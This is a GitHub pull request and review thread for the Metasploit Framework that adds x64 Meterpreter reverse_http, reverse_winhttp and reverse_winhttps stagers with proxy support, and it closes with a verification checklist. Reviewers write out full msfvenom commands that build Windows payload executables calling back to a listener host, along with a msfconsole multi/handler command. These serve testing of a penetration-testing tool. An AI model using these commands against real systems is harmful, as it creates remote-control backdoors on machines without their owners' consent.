New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Implement x64 versions of reverse_http, reverse_winhttp and reverse_winhttps #5328
Conversation
This laid the groundwork for implementation of reverse_http as well.
Still need to bake in support for proxies in the stagers, but wer'e getting there.
Proxy user/pass coming shortly.
Refactoring, ready to get the proxy stuff going.
Now working fine with proxy settings.
Woot, this somehow reduces the payload sizes by 2 bytes... woot.. or something.
Still has some quirks to fix up, but we're getting there. Everything seems to work except for reverse_winhttps. I can't see why at this point.
:proxy_pass => datastore['PayloadProxyPass']) | ||
|
||
blob = encode_stage(blob) | ||
blob = stage_payload({ |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
No need for {
here and omitting it makes it easier to change the method to keyword arguments later.
Running this merged with #5300 shows a couple of errors:
|
Hmm... you shouldn't need to merge this because the work was based off it. |
Not getting issues here @bcook-r7, are those errors appearing in the console when you start it? |
This commit fixes up the winhttps stuff properly too. PHEW!
Just fixing the build, and payload sizes and we should be good to go. Finally. |
This psexec payload size should be evaluated to make sure I'm not doing anything stupid. i can't see a reason why increasing these sizes would be bad. They seem to work fine.
I am still seeing the payload use the wrong proxy settings compared to the stager. Here are the commands I used, and the connections made first by the stager and then by meterpreter: ./msfvenom -p windows/x64/meterpreter/reverse_http PayloadProxyHost=192.168.56.1 PayloadProxyPort=4445 lhost=192.168.56.1 lport=4444 -f exe -o test.exe ./msfconsole -qx 'use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_http; set lhost 192.168.56.1; set lport 4444; run'
|
Strange. In my set up, my |
Is my problem specific to the PayloadProxyPort then? |
I would be surprised if the existing stagers don't behave the same. I think the problem is that we don't set ProxyBypass. This means that it will behave in the default manner and won't use the proxy for local addresses. Given that you're on the same subnet, is that something that the IE stuff considers "local" ? The docs say:
So the docs imply that this isn't the case, but I'm just wondering :) |
Just to be clear, are we saying that Meterpreter is doing it wrong and the stager is doing it right? |
Yes - I see the correct port from the stager, followed by incorrect from meterpreter. |
Here's debug output from my testing:
This machine can't route to Are you using an exploit, like psexec here, or are you using a pre-baked exe with multi/handler? |
Prebaked EXE - the exact commands I ran are above. I then used wireshark to see what connections it made. |
You didn't set the proxy details in the listener. The second stage doesn't know what proxy to use. |
D'oh, for some reason I thought that was getting handed off now. |
No, I'm afraid not. I did think about doing that, but again that bloats the stager as it'd have to construct the Meterpreter configuration on the fly. That's still left up to MSF I'm afraid. |
Heh, I guess once payload UUIDs are being persistently tracked, the payload proxy info could be resurrected from there automatically as well. Thanks. |
Yeah I guess they could! That'd be handy. |
I'm calling this good to go, @jlee-r7 things ok for you as well? |
You're going to hate me, but I get an illegal instruction from: ./msfvenom -p windows/x64/meterpreter/reverse_winhttp PayloadProxyHost=192.168.56.1 PayloadProxyPort=4445 lhost=192.168.56.1 lport=4444 -f exe -o test.exe x64/reverse_winhttps worked fine |
Thanks @bcook-r7. I'm not seeing illegal instructions in the stagers, but I am seeing that metsrv is no longer playing ball for some reason, despite it not changing. Both winhttp and winhttps stagers (x64) worked nicely for me on Win7, Win8.1 and Win2012. But I'm seeing metsrv behave strangely. |
OK, ignore previous comment. All kinds of configuration things were going wrong for me and I'm now back to parity. Doing more testing. |
@bcook-r7 I've just done a full run with Tested using |
Nope, things look fine. I'm going to land this. I think I had a bad config earlier that was causing the issue, or something bogus cached on the proxy. |
Whew, done. Thanks for the help. |
Epic mate, thanks so much for all the support, testing, help.. etc.. .AGAIN! Really appreciate it. |
This PR includes three new stagers along with a bunch of refactorings/changes to support them. The work is based on the work done in #5300
and so that PR (along with the binaries it relies on) need to be landed first(all landed now).The stagers implemented are:
windows/x64/meterpreter/reverse_http
- HTTP transport usingwininet
(for some reason this wasn't in MSF initially, and has been added for feature parity).windows/x64/meterpreter/reverse_winhttp
- HTTP transport usingwinhttp
.windows/x64/meterpreter/reverse_winhttps
- HTTPS transport usingwinhttp
. This also includes support for SSL Certificate verification.All of the payloads support proxy settings, however the ones using
winhttp
won't work with the "default" proxy just yet. There is an outstanding issue for both x64 and x86winhttp
payloads to have this resolves in some way. That, along with the Meterpreter work to solve this problem, will come in another PR.This changset also adds
Rex::Text.block_api_hash
which lets us calculate the function hash for block API on the fly. I haven't added specs yet (sorry @jlee-r7), but I will be adding them soon!Notes
I had to do some serious dancing with "alignment" related issues on x64. I have no idea why this is the case, nor is it documented in older versions of the stagers. I'd love for someone to clarify why arbitrary
push 0
seems to fix various problems to do with alignment. I'm stupid, please unstupify me!Sample runs
Not included, because they're rather boring. Happy to add if people want to see a meterpreter session running.
Verification
Some refactoring work was done that resulting in all the http payloads being hit. So..
reverse_http
works.reverse_http
works.reverse_https
works.reverse_https
works.reverse_winhttp
works.reverse_winhttp
works.reverse_winhttps
works.reverse_winhttps
works.reverse_http
works.reverse_http
works.reverse_https
works.reverse_https
works.reverse_winhttp
works.reverse_winhttp
works.reverse_winhttps
works.reverse_winhttps
works.reverse_winhttps
payloads works with SSL certificate verification.Again, note that
reverse_winhttps
will not work with proxy settings that are set in the "Internet Options" for IE. That's coming later.